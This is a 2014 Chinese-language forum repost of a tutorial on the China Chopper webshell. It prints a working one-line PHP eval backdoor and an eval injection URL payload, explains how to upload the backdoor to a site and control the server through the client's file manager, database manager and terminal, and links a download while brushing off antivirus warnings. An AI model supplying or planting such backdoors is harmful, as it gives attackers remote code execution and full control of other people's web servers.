中国菜刀的功能介绍和使用方法(黑站利器与后门利用测试工具)

李雷和韩梅梅 發表於 2014-5-9 14:49:07

中国菜刀的功能介绍和使用方法(黑站利器与后门利用测试工具)

中国菜刀，一个非常好用而又强大的webshell，它可不是用来切菜的做饭的道具哦，是一款专业的网站管理软件，大小只有300多KB，真是小巧实用啊！不过被不法分子利用到，就是一个黑站的利器了。我记得以前接触的时候摸索了好久才会用，哈哈。。后来领悟之后才发现并不难操作，同时功能也比我想象的要强大。 注：单独的菜刀没有效果，需要服务器端有一句话后门，或漏洞，例如这样的 http://127.0.0.1:89/mingfang/index.php?q=${${@eval%28$_POST%29}} 配置图： <img src="https://img.jbzj.com/file_images/article/201405/20140509145345.gif?201449145416" width="469" height="236" alt="" />
1.中国菜刀支持的服务端脚本：PHP、ASP、asp.net；
2.主要功能有：文件管理（有足够的权限时候可以管理整个磁盘/文件系统），数据库管理，虚拟终端。
3.菜刀的工作原理是：利用上传到服务器的一句话脚本再通过一些添加配置就可以工作了。
今天我只介绍PHP的方法（其他的大同小异）。
首先：我们首先要新建一个php文件，文件名随意取，然后写入一句代码：
<?php eval($_POST['ee']); ?> 
 ；eval()这个函数大家并不陌生吧，就是把里面的字符串作为PHP代码执行。最后把这个文件保存，上传到你站点里面，可以是根目录，也可以是其他，都行的。如下图：
<img alt="" src="https://img.jbzj.com/file_images/article/201405/201405091446532.jpg" />
第二步：打开菜刀这个软件，进入如下界面，右键点击“添加”；如下图：
<img alt="" src="https://img.jbzj.com/file_images/article/201405/201405091446533.jpg" />
第三步：此时会弹出一个添加shell的对话框，由图一看出我的 “dxr.php”上传在站点根目录，所以这里的地址填为：http://localhost/dxr.php 。地址后面的小框框里面的“ee”就是你的“口令”，也就是
<?php eval($_POST['ee']); ?> 
这里的“ee”。下面配置项如果你知道用户名密码就填，不知道，不填，也不会影响文件管理和虚拟终端这两个功能，只是不能查看数据库了。
<img alt="" src="https://img.jbzj.com/file_images/article/201405/201405091446534.jpg" />
最后：点击“添加”按钮，成功后就会产生一条新的记录，鼠标右键点击就可以进行操作了，如下图，可以进行文件管理，数据库管理，虚拟终端。哈哈...大功告成！！
<img alt="" src="https://img.jbzj.com/file_images/article/201405/201405091446535.jpg" />   
所以很多黑站者利用一些网站漏洞，上传一句话木马后，就基本上可以黑下你的站了。中国菜刀，就是这么强大！！
操作效果截图一：
<img alt="" src="https://img.jbzj.com/file_images/article/201405/201405091446536.jpg" />  
操作效果截图二：
<img alt="" src="https://img.jbzj.com/file_images/article/201405/201405091446537.jpg" />  
操作效果截图三：
<img alt="" src="https://img.jbzj.com/file_images/article/201405/201405091446538.jpg" /> 
菜刀下载：https://www.jb51.net/softs/163997.html
终于写完了，喜欢的话就支持一下哦，代潇瑞博客，专注于PHP学习！！
最后说明一下：此软件打开时杀毒软件可能会报毒的，我已经用了很多遍，反正都没事。如果你不相信的话，也就不用下载了，呵呵。 原文参考：http://www.daixiaorui.com/read/17.html

頁: [1]

琼殿技术论坛's Archiver

中国菜刀的功能介绍和使用方法(黑站利器与后门利用测试工具)